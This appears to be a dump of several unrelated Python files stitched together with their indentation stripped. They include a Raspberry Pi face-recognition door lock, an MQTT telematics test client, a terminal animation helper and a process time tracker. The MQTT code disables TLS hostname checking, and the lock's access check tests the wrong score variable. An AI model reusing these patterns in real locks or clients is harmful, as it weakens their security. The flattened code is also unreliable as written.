:param smartLock: object used to access unlocking functions and door status
:type smartLock: SmartLock object
"""
cap = cv2.VideoCapture(0)
#get labels
with open(props['classification']['labels']) as f:
labels_map = json.load(f)
#loading detection model
detection = DetectionEngine(props['detection'])
classification = ClassificationEngine(props['classification']['path'])
while cap.isOpened():
ret, cv2_im = cap.read()
if not ret:
break
# flip picture
cv2_im = cv2.flip(cv2_im,-1)
# Skip classification if door is open
if not smartLock.is_door_closed():
#shuffle all the pixels and make the picture unrecoginzable
cv2_im = cv2.randShuffle(cv2_im)
#TODO Indicate that door is open
cv2.imshow('FIDL', cv2_im)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
continue
pil_im = Image.fromarray(cv2_im)
# TODO check first if the there is movement in the picture before utilizing edge tpu (power saving)
#searching for faces in the picture
faces = detection.detect_with_image(pil_im,threshold = 0.5, top_k =3,keep_aspect_ratio=True,relative_coord=True)
#check each face and append results to frame
height, width, _= cv2_im.shape
for face in faces:
x0, y0, x1, y1 = face.bounding_box.flatten().tolist()
x0, y0, x1, y1 = int(x0*width), int(y0*height), int(x1*width), int(y1*height)
#crop out face from camera picture
face_im = Image.fromarray(cv2_im[y0:y1,x0:x1])
#classify face
results = classification.classify_with_image(face_im,threshold=0.1,top_k=3)
#annotate frame
best_result = (0,0) # index, score
text_lines = []
for index, score in results:
if score > best_result[1]:
best_result = (index, score)
text_lines.append('score=%.2f: %s' % (score, labels_map[str(index)])) #TODO decide to show all scores or only best score
access_granted = props['user'][labels_map[str(best_result[0])]]['access'] and score >= 0.9
#open the door
if access_granted and smartLock.unlocking == False:
threading.Thread(target = smartLock.unlock, daemon = True).start()
# TODO indicate unlocking
#Coloring green if access was granted
cv2_im = cv2.rectangle(cv2_im, (x0, y0), (x1, y1), (0, 255, 0) if access_granted else (0,0,255), 2)
for y, line in enumerate(text_lines):
cv2.putText(cv2_im,line,(x0 + 10,y0 + y*20+20),fontFace=cv2.FONT_HERSHEY_SIMPLEX,fontScale =0.5, color=(255, 255, 255))
cv2.imshow('FIDL', cv2_im)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
class SmartLock(object):
"""
An object for easliy interacting the SmartLock which consists of an ultra sonic sensor, a relais, a door sensor and a servo motor.
Functonality:
Fetching distance from Ultra sonics sensor
Approximating speed
Changing state of relais
Fetching status of the door (closed/open)
Manually setting angle of servo motor
unlocking the lock (predefined sequence of servo and relais statements)
Automatic unlocking when approaching the door
"""
def __init__(self, trig_pin = 18, echo_pin = 24, relais_pin = 23, door_sensor_pin = 25, servo_pin = 13, max_distance = 100):
"""
:param trig_pin: The pin attached to the trigger pin of the ultra sonic sensor (BCM)
:type trig_pin: int
:param echo_pin: The pin attached to the echo pin of the ultra sonic sensor (BCM)
:type echo_pin: int
:param relais_pin: The pin attached to the relais (BCM)
:type relais_pin: int
:param door_sensor_pin: The pin attached to the door sensor (BCM)
:type door_sensor_pin: int
:param servo_pin: The pin attached to the servo motor (BCM)
:type servo_pin: int
:param max_distance: The maximum distance the ultrasonic sensor should consider when gethering the distance
:type max_distance: int
"""
self.trig_pin = trig_pin
self.echo_pin = echo_pin
self.relais_pin = relais_pin
self.door = door_sensor_pin
self.servo_pin = servo_pin
self.max_distance = max_distance
#initlizing the data from the ultra sonic sensor as None
self.measurements = []
self._reset_measurements()
self.unlocking = False
def _init_GPIO(self):
"""
Intilizing all the GPIO setting
"""
GPIO.setmode(GPIO.BCM)
#setting up GPIO
GPIO.setup(self.trig_pin, GPIO.OUT)
GPIO.setup(self.echo_pin, GPIO.IN)
GPIO.setup(self.relais_pin, GPIO.OUT)
GPIO.setup(self.door,GPIO.IN, pull_up_down = GPIO.PUD_UP)
GPIO.setup(self.servo_pin,GPIO.OUT)
#Turn relais off
GPIO.output(self.relais_pin, GPIO.LOW)
#set servo frequency and start pulse
# you may edit the frequency depending on the frequency of your servo
self.pulse = GPIO.PWM(self.servo_pin, 50)
self.pulse.start(0)
def is_door_closed(self):
"""
Returning the status of the door by reading the door sensor
return True if door closed
:return type: boolean
"""
return GPIO.input(self.door)
### Ultrosonic sensor and related algortihms ###
def _reset_measurements(self):
"""
setting all measurements to None
"""
self.measurements = [(None, None) for i in range(10)]
def get_distance(self):
"""
Fetching distance from ultrosonic sensor within the defined range
returning None if distance is greater the predefinec max_measurment
measurements in centimeter
:return type: float or None
"""
#Triggering the ultrasonic sensor to play sound.
GPIO.output(self.trig_pin, True)
time.sleep(0.00001)
GPIO.output(self.trig_pin, False)
#initilzing time variables
StartTime = time.time()
StopTime = time.time()
#Fetching the start time until the ourtuut of the echo pin of the sensor changes from Low to high
while GPIO.input(self.echo_pin) == 0:
StartTime = time.time()
#Fetching end time
while GPIO.input(self.echo_pin) == 1:
StopTime = time.time()
# time difference between start and arrival
TimeElapsed = StopTime - StartTime
# multiply with the sonic speed (34300 cm/s) in air and take account double travel
distance = round((TimeElapsed * 34300) / 2, 2)
#ignoring all values which are not in range
if distance > self.max_distance:
return None
return distance
def approach_detected(self):
"""
Function to determin if something is approaching the Sensor
This use linear regression to approximate the approaching speed
:return type: boolean
"""
if any([None in pt for pt in self.measurements]): #TODO fix that somehow
#Not enough critical data was gethered
return False
#using linear regression to determine an approach
x = [pt[0] for pt in self.measurements]
x_mean = round(sum(x) / len(x), 2)
y = [pt[1] for pt in self.measurements]
y_mean = round(sum(y) / len(y), 2)
#slope is equivalent to the approaching speed
speed = round(sum([(pt[0] - x_mean)*(pt[1] - y_mean) for pt in self.measurements])/sum([(x-x_mean)**2 for x in x]),2)
#threshould is an approaching speed of 30cm per second
if speed <= -30:
return True
#no approach
return False
#####################################################
#### Servo and related algorithms ####
def _set_servo_angle(self,angle):
"""
Moving the Servo motor to a predefined valid angle
:param angle: an angle between 0 and 180
:type angle: int
"""
if angle >= 0 and angle <= 180:
# you may change this depending on your servo
duty = float(angle) /12
self.pulse.ChangeDutyCycle(duty)
time.sleep(1)
# 0 pulse means it is inactive
self.pulse.ChangeDutyCycle(0)
def _set_servo_power(self, state):
"""
Powering on/off the servo motor with relais
:param state: True for High (on), False for Low (off)
:type state: boolean
"""
GPIO.output(self.relais_pin, state)
def unlock(self):
"""
Sequence to unlock the door by using the servo motor
You may edit the angles to adjust it your lock
"""
self.unlocking = True
#power servo on
self._set_servo_power(True)
#moving servo to unlocking position
self._set_servo_angle(30)
time.sleep(5)
#moving the servo back to a resting postion
self._set_servo_angle(72)
#giving the servo enough time to move there before turning it off
time.sleep(2)
self._set_servo_power(False)
self.unlocking = False
##################################################
def run(self):
"""
Constantly checking wheather someone tries to leave the room, to unlock the door
"""
try:
self._init_GPIO()
#move servo to resting postion
self._set_servo_power(True)
self._set_servo_angle(72)
time.sleep(2)
self._set_servo_power(False)
#taking measueremnts and gethering approaching status
while True:
#unlocking is only relevant if the door is closed
if self.is_door_closed():
for i in range(len(self.measurements)):
self.measurements[i] = (time.time(),self.get_distance())
time.sleep(0.1)
if not self.is_door_closed():
self._reset_measurements()
break
elif self.approach_detected() and self.unlocking == False:
#unlocking the door
self.unlock()
self._reset_measurements()
except KeyboardInterrupt:
#move servo to resting postion
self._set_servo_power(True)
self._set_servo_angle(72)
time.sleep(2)
self.pulse.stop()
self._set_servo_power(False)
GPIO.cleanup()
#TODO turn realais way in advance on (maybe servo as well) because there might be issues with turning it right before moving the servo
|
MqttComm.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (C) 2015-2018 Shenzhen Auto-link world Information Technology Co., Ltd.
All Rights Reserved
Name: MqttComm.py
Purpose:
Created By: Clive Lau <liuxusheng@auto-link.com.cn>
Created Date: 2018-01-11
Changelog:
Date Desc
2018-01-11 Created by Clive Lau
"""
# Builtin libraries
import time
import threading
# Third-party libraries
from robot.api import logger
import paho.mqtt.client as mqtt
# Customized libraries
from Protobuf import tbox_pb2
from MqttDump import MqttDump
from CanComm.CanProtoDFSK import EnumDoorStatus
from CanComm.CanProtoDFSK import EnumLockStatus
from CanComm.CanProtoDFSK import EnumHandbrakeStatus
from CanComm.CanProtoDFSK import EnumAcOnOffStatus
from CanComm.CanProtoDFSK import EnumEmsEngineStatus
from CanComm.CanProtoDFSK import EnumWiperStatus
from CanComm.CanProtoDFSK import EnumGearPos
# MQTT Server Settings
MQTT_MAJOR_SERVER = "test.mosquitto.org"
# MQTT_MINOR_SERVER = "14.21.42.158"
MQTT_MINOR_SERVER = "192.168.3.8"
MQTT_MAJOR_ENCRYPTION = "Encryption/mosquitto.org.crt"
MQTT_MINOR_ENCRYPTION = "Encryption/autolink_tbox.crt"
MQTT_SERVER_PORT = 8883
MQTT_USER = ""
MQTT_PWD = ""
# MQTT Topic Settings
MQTT_WILL_TOPIC = "all/will"
MQTT_REPORT_TOPIC = "device/gate/report"
MQTT_BUSINESS_TOPIC = "device/gate/business"
MQTT_DEVICE_TOPIC_PREFIX = "gate/per/device/"
MQTT_DEVICE_TOPIC_SUFFIX = "/order"
class MqttComm(object):
""""""
IPADDRS = {'mosquitto.org': 'test.mosquitto.org', 'auto-link.com.cn': '192.168.3.8'}
def __init__(self, expected_device, server):
# LogTag
self._tag = self.__class__.__name__ + ' '
logger.info(self._tag + "__init__ called")
# Message head parameter
self._protocol_version = 0
self._equipment_id_type = tbox_pb2.PDID
self._msg_id = 1
self._token = "token-" + expected_device
# MQTT parameter
self._mqttc = None
self._expected_device = expected_device
self._server = MqttComm.IPADDRS[server]
self._is_connected = False
self._msgtop = None
self._handle_topic_dict = {
MQTT_WILL_TOPIC: self.__handle_topic_will,
MQTT_REPORT_TOPIC: self.__handle_topic_report,
MQTT_BUSINESS_TOPIC: self.__handle_topic_business,
}
self._handle_report_dict = {
tbox_pb2.DATAMINING: self.__on_response_datamining,
tbox_pb2.VEHICLE_STATUS: self.__on_response_vehicle,
}
self._handle_business_dict = {
tbox_pb2.LOGIN: self.__on_response_login,
tbox_pb2.REMOTE_CONFIG_RESULT: self.__on_response_remote_config,
}
# Sync parameter
self._event = threading.Event()
self._result = False
# Threading parameter
self._parse_thread = None
# CAN msg parameter
self._can_msg_type = None
self._can_config_item = None
self._can_config_data = None
def __del__(self):
logger.info(self._tag + "__del__ called")
def on_create(self):
logger.info(self._tag + "on_create called")
# MsgTop
self._msgtop = tbox_pb2.MsgTop()
# MQTT onCreate
self._mqttc = mqtt.Client()
encryption = MQTT_MAJOR_ENCRYPTION if self._server == MQTT_MAJOR_SERVER else MQTT_MINOR_ENCRYPTION
if encryption != '':
try:
self._mqttc.tls_set(encryption)
self._mqttc.tls_insecure_set(True)
except Exception, e:
logger.error(self._tag + "Exception on set MQTT TLS: " + str(e))
if MQTT_USER != '':
self._mqttc.username_pw_set(MQTT_USER, MQTT_PWD)
self._mqttc.on_connect = self.__on_connect
self._mqttc.on_message = self.__on_message
try:
self._mqttc.connect(self._server, MQTT_SERVER_PORT)
self._mqttc.loop_start()
except Exception, e:
logger.error(self._tag + "Exception on connect MQTT Server: " + str(e))
return False
return True
def on_destroy(self):
logger.info(self._tag + "on_destroy called")
# MQTT onDestroy
if self._mqttc is None:
return
self._mqttc.unsubscribe(MQTT_WILL_TOPIC)
self._mqttc.unsubscribe(MQTT_REPORT_TOPIC)
self._mqttc.unsubscribe(MQTT_BUSINESS_TOPIC)
self._mqttc.loop_stop(True)
self._mqttc.disconnect()
@property
def is_connected(self):
logger.console(self._tag + "is connected: " + str(self._is_connected))
return self._is_connected
def __on_connect(self, client, userdata, flags, rc):
logger.console(self._tag + "Connected with result:" + mqtt.connack_string(rc))
client.subscribe(MQTT_WILL_TOPIC, qos=1)
client.subscribe(MQTT_REPORT_TOPIC, qos=1)
client.subscribe(MQTT_BUSINESS_TOPIC, qos=1)
def __on_message(self, client, userdata, msg):
logger.console(self._tag + "=====================New Message=====================")
self._parse_thread = threading.Thread(target=self.__parse_thread, args=(client, userdata, msg,), name='on_parse')
self._parse_thread.daemon = True
self._parse_thread.start()
self._parse_thread.join()
def __parse_thread(self, client, userdata, msg):
logger.console((self._tag + "__parse_thread called"))
self._handle_topic_dict[msg.topic](client, userdata, msg)
def __handle_topic_will(self, client, userdata, msg):
logger.console(self._tag + "__handle_topic_will called")
logger.console(self._tag + msg.payload)
if self._expected_device == msg.payload:
logger.warn("Entry WILL Topic: " + msg.payload)
self._is_connected = False
def __handle_topic_report(self, client, userdata, msg):
logger.console(self._tag + "__handle_topic_report called")
msgtop = tbox_pb2.MsgTop()
msgtop.ParseFromString(msg.payload)
if self.__is_valid_device(msgtop):
# set parameter
if not self._is_connected:
self._protocol_version = msgtop.message_head.protocol_version
self._equipment_id_type = msgtop.message_head.equipment_id_type
self._msg_id = msgtop.message_head.message_id
self._token = "token-" + self._expected_device
self._is_connected = True
MqttDump.dump(msgtop)
handle = self._handle_report_dict.get(msgtop.message_head.msg_type, None)
if handle is not None:
handle(client, userdata, msgtop)
def __handle_topic_business(self, client, userdata, msg):
logger.console(self._tag + "__handle_topic_business called")
msgtop = tbox_pb2.MsgTop()
msgtop.ParseFromString(msg.payload)
if self.__is_valid_device(msgtop):
# set parameter
if not self._is_connected:
self._protocol_version = msgtop.message_head.protocol_version
self._equipment_id_type = msgtop.message_head.equipment_id_type
self._msg_id = msgtop.message_head.message_id
self._token = "token-" + self._expected_device
self._is_connected = True
MqttDump.dump(msgtop)
handle = self._handle_business_dict.get(msgtop.message_head.msg_type, None)
if handle is not None:
handle(client, userdata, msgtop)
def __on_response_datamining(self, client, userdata, msgtop):
self._msgtop.datamining.CopyFrom(msgtop.datamining)
def __on_response_vehicle(self, client, userdata, msgtop):
self._msgtop.vehicle_status.CopyFrom(msgtop.vehicle_status)
def __inc_msg_id(self):
self._msg_id = (self._msg_id + 1) % 0xFFFF
if self._msg_id == 0:
self._msg_id = 1
return self._msg_id
def __is_valid_device(self, msgtop):
logger.info(self._tag + "__is_valid_device called, DevId:" + msgtop.message_head.equipment_id)
return msgtop.message_head.equipment_id == self._expected_device
def __fill_message_head(self, msgtop, msg_id, msg_type, flag=False):
msgtop.message_head.protocol_version = self._protocol_version
msgtop.message_head.equipment_id_type = self._equipment_id_type
msgtop.message_head.equipment_id = self._expected_device
msgtop.message_head.message_id = msg_id
msgtop.message_head.msg_type = msg_type
msgtop.message_head.message_create_time = int(time.time())
msgtop.message_head.token = self._token
msgtop.message_head.flag = flag
def __on_response_login(self, client, userdata, msgtop):
""" on_response_login """
logger.console(self._tag + "on_response_login called")
# set parameter
if not self._is_connected:
self._protocol_version = msgtop.message_head.protocol_version
self._equipment_id_type = msgtop.message_head.equipment_id_type
self._msg_id = msgtop.message_head.message_id
self._token = "token-" + self._expected_device
self._is_connected = True
publish_msg = tbox_pb2.MsgTop()
# message_head
self.__fill_message_head(publish_msg, self._msg_id, tbox_pb2.LOGIN_RESPONSE)
# login_response
publish_msg.login_response.ack_code.ack_code = tbox_pb2.SUCCESS
publish_msg.login_response.ack_code.code_desp = "Succeed to login"
publish_msg.login_response.token = self._token
# publish
client.publish(MQTT_DEVICE_TOPIC_PREFIX + self._expected_device + MQTT_DEVICE_TOPIC_SUFFIX,
publish_msg.SerializeToString())
logger.console(self._tag + "on_response_login done")
def __set_remote_config_item(self, msgtop, item, data):
if item == tbox_pb2.MQTT_SERVER_ADDR:
msgtop.remote_config_request.config_data.mqtt_server_addr = data
elif item == tbox_pb2.MQTT_SERVER_TOPIC:
msgtop.remote_config_request.config_data.mqtt_server_topic = data
elif item == tbox_pb2.MQTT_KEY_BUSINESS_SERVER_ADDR:
msgtop.remote_config_request.config_data.mqtt_key_business_server_addr = data
elif item == tbox_pb2.MQTT_KEY_BUSINESS_SERVER_TOPIC:
msgtop.remote_config_request.config_data.mqtt_key_business_server_topic = data
elif item == tbox_pb2.ECALL_NUMBER:
msgtop.remote_config_request.config_data.ecall_number = data
elif item == tbox_pb2.BCALL_NUMBER:
msgtop.remote_config_request.config_data.bcall_number = data
elif item == tbox_pb2.ICALL_NUMBER:
msgtop.remote_config_request.config_data.icall_number = data
elif item == tbox_pb2.ECALL_ENABLE:
msgtop.remote_config_request.config_data.ecall_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.BCALL_ENABLE:
msgtop.remote_config_request.config_data.bcall_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.ICALL_ENABLE:
msgtop.remote_config_request.config_data.icall_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.SMS_GATE_NUMBER_UPLOAD:
msgtop.remote_config_request.config_data.sms_gate_number_upload = data
elif item == tbox_pb2.SMS_GATE_NUMBER_DOWNLOAD:
msgtop.remote_config_request.config_data.sms_gate_number_download = data
elif item == tbox_pb2.DATAMINING_UPLOAD_FREQUENCY:
msgtop.remote_config_request.config_data.datamining_upload_frequency = int(data)
elif item == tbox_pb2.VEHICLE_STATUS_UPLOAD_FREQUENCY:
msgtop.remote_config_request.config_data.vehicle_status_upload_frequency = int(data)
elif item == tbox_pb2.IGNITION_BLOWOUT_UPLOAD_ENABLE:
msgtop.remote_config_request.config_data.ignition_blowout_upload_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.UPLOAD_ALERT_ENABLE:
msgtop.remote_config_request.config_data.upload_alert_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.SVT_ENABLE:
msgtop.remote_config_request.config_data.svt_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.ELETRONIC_DEFENSE_ENABLE:
msgtop.remote_config_request.config_data.eletronic_defense_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.ABNORMAL_MOVE_THRESHOLD_VALUE:
msgtop.remote_config_request.config_data.abnormal_move_threshold_value = True if data.lower() == 'true' else False
else:
logger.error(self._tag + "Invalid RemoteConfigItem")
def __on_response_remote_config(self, client, userdata, msgtop):
""" on_response_remote_config """
logger.console(self._tag + "on_response_remote_config called")
if self._msg_id != msgtop.message_head.message_id:
logger.warn(self._tag + "on_response_remote_config: Not expected msg_id")
return
if msgtop.HasField("remote_config_result"):
# TODO: Handle receive mulit-config_items
for config in msgtop.remote_config_result.config_results:
self._result = config.result
self._event.set()
def on_request_remote_config(self, item, data, timeout):
"""
"""
logger.info(self._tag + "on_request_remote_config called")
convert_config_item_dict = {
'MQTT_SERVER_ADDR': tbox_pb2.MQTT_SERVER_ADDR,
'MQTT_SERVER_TOPIC': tbox_pb2.MQTT_SERVER_TOPIC,
'MQTT_KEY_BUSINESS_SERVER_ADDR': tbox_pb2.MQTT_KEY_BUSINESS_SERVER_ADDR,
'MQTT_KEY_BUSINESS_SERVER_TOPIC': tbox_pb2.MQTT_KEY_BUSINESS_SERVER_TOPIC,
'ECALL_NUMBER': tbox_pb2.ECALL_NUMBER,
'BCALL_NUMBER': tbox_pb2.BCALL_NUMBER,
'ICALL_NUMBER': tbox_pb2.ICALL_NUMBER,
'ECALL_ENABLE': tbox_pb2.ECALL_ENABLE,
'BCALL_ENABLE': tbox_pb2.BCALL_ENABLE,
'ICALL_ENABLE': tbox_pb2.ICALL_ENABLE,
'SMS_GATE_NUMBER_UPLOAD': tbox_pb2.SMS_GATE_NUMBER_UPLOAD,
'SMS_GATE_NUMBER_DOWNLOAD': tbox_pb2.SMS_GATE_NUMBER_DOWNLOAD,
'DATAMINING_UPLOAD_FREQUENCY': tbox_pb2.DATAMINING_UPLOAD_FREQUENCY,
'VEHICLE_STATUS_UPLOAD_FREQUENCY': tbox_pb2.VEHICLE_STATUS_UPLOAD_FREQUENCY,
'IGNITION_BLOWOUT_UPLOAD_ENABLE': tbox_pb2.IGNITION_BLOWOUT_UPLOAD_ENABLE,
'UPLOAD_ALERT_ENABLE': tbox_pb2.UPLOAD_ALERT_ENABLE,
'DATAMING_ENABLE': tbox_pb2.DATAMING_ENABLE,
'SVT_ENABLE': tbox_pb2.SVT_ENABLE,
'ELETRONIC_DEFENSE_ENABLE': tbox_pb2.ELETRONIC_DEFENSE_ENABLE,
'ABNORMAL_MOVE_THRESHOLD_VALUE': tbox_pb2.ABNORMAL_MOVE_THRESHOLD_VALUE,
}
config_item = convert_config_item_dict[item]
self._result = False
publish_msg = tbox_pb2.MsgTop()
# message_head
self.__fill_message_head(publish_msg, self.__inc_msg_id(), tbox_pb2.REMOTE_CONFIG_REQUEST)
# remote_config_request
publish_msg.remote_config_request.config_items.append(config_item)
self.__set_remote_config_item(publish_msg, config_item, data)
# publish
self._mqttc.publish(MQTT_DEVICE_TOPIC_PREFIX + self._expected_device + MQTT_DEVICE_TOPIC_SUFFIX, publish_msg.SerializeToString())
MqttDump.dump(publish_msg, logger.info)
# wait_event
self._event.wait(int(timeout))
if not self._event.isSet() or not self._result:
logger.error(self._tag + "Exception on remote_config_request: Timeout to wait event")
self._event.clear()
return self._result
def on_request_can_data(self, item, timeout):
"""
"""
logger.info(self._tag + "on_request_can_data called")
data_dict = {
'ENGINE_SPEED': self._msgtop.datamining.engine_speed,
'DRIVER_DOOR_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.lf_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'PASSENGER_DOOR_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.rf_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'LEFTREAR_DOOR_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.lr_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'RIGHTREAR_DOOR_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.rr_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'TAILGATE_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.trunk_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'DRIVER_DOOR_LOCK_STS': EnumLockStatus.Locked.name if self._msgtop.vehicle_status.lock_status == tbox_pb2.ONOFF_STATE_ON else EnumLockStatus.Unlock.name,
'HANDBRAKE_SIGNAL': EnumHandbrakeStatus.Up.name if self._msgtop.vehicle_status.hand_break_status == tbox_pb2.ONOFF_STATE_ON else EnumHandbrakeStatus.Down.name,
'AC_STS': EnumAcOnOffStatus.On.name if self._msgtop.vehicle_status.air_condition_status == tbox_pb2.ONOFF_STATE_ON else EnumAcOnOffStatus.Off.name,
'FRONT_DEFROST_STS': EnumAcOnOffStatus.On.name if self._msgtop.vehicle_status.air_condition_defrost_status == tbox_pb2.ONOFF_STATE_ON else EnumAcOnOffStatus.Off.name,
'REAR_DEFROST_STS': EnumAcOnOffStatus.On.name if self._msgtop.vehicle_status.air_condition_rear_defrost_status == tbox_pb2.ONOFF_STATE_ON else EnumAcOnOffStatus.Off.name,
'AC_TEMPERATURE': str(self._msgtop.vehicle_status.air_condition_temperature),
'ENGINE_STS': EnumEmsEngineStatus.KeyOff.name if self._msgtop.vehicle_status.engine_status == tbox_pb2.ENGINESTATE_UNKNOWN else EnumEmsEngineStatus(self._msgtop.vehicle_status.engine_status - 1).name,
'WIPER_STS': ('On' if self._msgtop.vehicle_status.wiper_Status == tbox_pb2.ONOFF_STATE_ON else 'Off'),
'GEAR_STS': EnumGearPos.S.name if self._msgtop.vehicle_status.gear_position == tbox_pb2.GEAR_S else EnumGearPos(self._msgtop.vehicle_status.gear_position).name,
}
return data_dict[item]
if __name__ == '__main__':
pass
|
interface.py
|
from .file_manager import download_json, download_text
from .general_tools import utf_decoder
from threading import Thread
from time import sleep
import platform
def form_result_from_cp(control_package, frame):
objs_amount = len(control_package["objs_for_anim"]) + \
len(control_package["dynamic_values"])
result_list = [None for i in range(objs_amount)]
for anim_obj in control_package["objs_for_anim"]:
result_list[anim_obj[1]] = anim_obj[0][frame % len(anim_obj[0])]
for dyn_val in control_package["dynamic_values"]:
result_list[dyn_val[1]] = dyn_val[0]
return result_list
def animator(control_package):
frame = 0
biggest_anim = max([len(obj[0]) for obj in
control_package["objs_for_anim"]])
while not control_package["stop"]:
result_list = form_result_from_cp(control_package, frame)
res = control_package["msg"].format(*result_list)
cterm("animation", res, "inf")
frame = (frame + 1) % biggest_anim
sleep(1 / control_package["fps"])
def create_animation(control_package):
"""
"control_package" : {
"msg" : special format string,
"objs_for_anim" : [
[anim_list, pos], ...
],
"dynamic_values" : [
[value, pos], ...
],
"fps": value of fps
}
"""
control_package["stop"] = False
anim_id = Thread(target=animator, args=(control_package, ))
anim_id.start()
return anim_id
def destroy_animation(anim_id, control_package):
control_package["stop"] = True
anim_id.join()
cterm("output", "", "inf")
def render_static(file):
header = download_text(file)
if header:
cterm("output", utf_decoder(header), "inf")
else:
header = "**** No header ****"
cterm("output", header, "inf")
def cterm(com_type, message, message_type):
"""
com_type - does it input or output or animation
message - the text
message_type - type from iface.json
"""
begin = iface_init.iface["colors"][iface_init.iface["pallete"][message_type]]
marker = iface_init.iface["markers"][message_type]
res_line = f"{begin}{marker}{message}"
if com_type == "input":
res_line += iface_init.iface["colors"][iface_init.iface["pallete"]["def"]]
return input(res_line)
if com_type == "animation":
print("\r" + res_line, end="")
else:
print(res_line)
def iface_init(profile_dir):
try:
iface_init.iface = download_json(profile_dir + "iface.json")
if platform.system() == 'Windows':
for color in iface_init.iface["colors"]:
iface_init.iface["colors"][color] = ""
render_static(profile_dir + "crypto.header")
except FileNotFoundError:
exit()
iface_init.iface = None # Make in better
|
base_thread_module.py
|
from abc import abstractmethod
from threading import Thread
from up.base_started_module import BaseStartedModule
class BaseThreadModule(BaseStartedModule):
def __init__(self):
super().__init__()
self.__thread = None
def _execute_initialization(self):
super()._execute_initialization()
def _execute_start(self):
super()._execute_start()
self.__thread = Thread(target=self._loop, name="Thread-%s" % self.__class__.__name__)
self.__run = True
self.__thread.start()
return True
def _execute_stop(self):
super()._execute_stop()
self.__run = False
if self.__thread:
self.__thread.join()
self.__thread = None
@abstractmethod
def _loop(self):
pass
@property
def _run(self):
return self.__run
|
Main.py
|
#!/usr/bin/env python3.6
"""Main class of the Time Manager."""
# System imports
import sys
import time
import os
from threading import Thread
# Local import
import OSFactory
import ProcessFileManager
import TimeActivity
import UIServer
class TimeManager(object):
"""Time manager main class."""
def __init__(self):
"""Constructor."""
self.__osFactory = OSFactory.OSFactory()
self.__processeFileManager = ProcessFileManager.ProcessFileManager()
self.__timeActivity = TimeActivity.TimeActivity()
self.__os = self.__getOS()
self.__processCounter = {}
# This is a generic counter for different proccess within the main loop
self.__mainCounter = {'saveSession': 0}
def run(self):
"""Run the main app and start recording the processes use."""
osConfig = self.__os.getConfig()
while True:
processToClose = self.__os.getClosedProcesses()
# Iterate over active processes and wait for the cycles setted to declare it idle.
for processId, counter in self.__processCounter.items():
if counter == osConfig['idleCycles']:
processToClose.append(processId)
continue
self.__processCounter[processId] += 1
# Clean the counter
for id in processToClose:
if id in self.__processCounter:
del self.__processCounter[id]
# Stop the process that are idle
self.__processeFileManager.stopProcesses(processToClose)
# Get active processes and register them
processes = self.__os.getActiveProcesses()
for process in processes:
# Clean the name for windows processes
procName = process.info['name'].lower().replace('.exe', '')
self.__processeFileManager.registerActiveProcess(procName, process.info['pid'])
self.__processCounter[process.pid] = 0
# Save session
if self.__mainCounter['saveSession'] == osConfig['saveSessionCycles']:
self.saveSession()
self.__mainCounter['saveSession'] = 0
else:
self.__mainCounter['saveSession'] += 1
# Wait for lookup seconds to look for more processes
time.sleep(osConfig['lookupTime'])
def getCurrentTimePerProcess(self):
"""Calculate the time per process base on the current session."""
return self.__timeActivity.getCurrentTimePerProcess(self.__processeFileManager.getProcessSession())
def getWeeklyTime(self):
"""Calculate the time per process base on the current session."""
savedSession = self.__processeFileManager.getSavedSession()
return self.__timeActivity.getProcessesByTime(savedSession, days=7)
def saveSession(self):
"""Save the current session in a JSON file."""
self.__processeFileManager.saveSession()
def __getOS(self):
"""Get the main OS module."""
osName = sys.platform
return self.__osFactory.getOS(osName)()
if __name__ == '__main__':
# Set threads to each process so it will be faster and can handle infinte cycles on each thread
tm = TimeManager()
threadRun = Thread(target=tm.run)
threadRun.start()
threadServer = Thread(target=UIServer.UIServer, args=(tm,))
threadServer.start()
|
Tools.py
|
debugging = False
version = 4.2
import time, tempfile, os, json, sys, darkdetect, webbrowser, subprocess
from threading import Thread
from sys import platform as _platform
from PySide2 import QtWidgets, QtCore, QtGui
from ast import literal_eval
if(len(sys.argv)>1):
zip = sys.argv[1]
if('debug' in zip):
debugging=True
realpath = ""
dataToLog = []
app = None
tempDir = tempfile.TemporaryDirectory()
defaultSettings = {
"default_algorithm": "Deflated",
"default_level": 5,
"create_subdir": True,
"mode": "auto",
"autoCheckForUpdates": True,
"plainAppearance": _platform=="darwin"
}
settings = defaultSettings.copy()
if hasattr(sys, 'frozen'):
realpath = sys._MEIPASS
else:
realpath = '/'.join(sys.argv[0].replace("\\", "/").split("/")[:-1])
def getPath(file):
return os.path.join(os.path.join(realpath, "res"), file).replace("\\", "/")
baseStyleSheet = """
QLabel QPushButton QTreeView{font-size: 11px;}
"""
if(_platform=="darwin"):
baseStyleSheet += """QTabBar::tab {
padding: 5px;
}
QTabBar::tab:hover{background-color: #0E7AFE;
}
QTabBar::tab:selected{background-color: #0E7AFE;
}
QTabBar:tab:first{border-top-left-radius: 5px;border-bottom-left-radius: 5px;}
QTabBar:tab:last{border-top-right-radius: 5px;border-bottom-right-radius: 5px;}
QTabBar:tab:only-one{border-radius: 5px;}
"""
def setMainApp(newApp: QtWidgets.QApplication):
global app
app = newApp
def log(s: str, force: bool = False) -> None:
global debugging
timePrefix = time.strftime('[%H:%M:%S] ', time.gmtime(time.time()))
dataToLog.append(timePrefix+str(s))
log(f"[ OK ] REALPATH set to \"{realpath}\"")
def logToFileWorker() -> None:
print(f"[##:##:##] [ OK ] File thread started on temp folder {tempDir.name}")
while True:
if len(dataToLog)>0:
try:
